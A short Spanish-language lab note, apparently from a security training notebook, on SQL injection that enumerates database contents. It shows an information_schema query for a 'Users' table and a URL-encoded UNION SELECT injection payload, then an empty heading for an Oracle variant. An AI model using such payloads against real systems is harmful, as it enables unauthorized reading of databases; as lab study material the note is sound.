💀Laboratorio: ataque de inyección SQL, enumerando el contenido de la base de datos en bases de datos
SELECT * FROM information_schema.columns WHERE table_name = 'Users' #aqui podemos ver que hay un atributo
#llamado table_name de .columns de schema, asi que ese es el que tomaremos para que retorne.
'+UNION+SELECT+'abc','def'-- 






Laboratorio #2 De enumerando el contenido de la Base de Datos pero esta vez en BD Oracle:




PreviousLaboratorio: ataque SQLi, consulta del tipo y versión de la base de datos en MySQL y MicrosoftNextLaboratorio: Inyección SQL con omisión de filtro mediante codificación XML
Last updated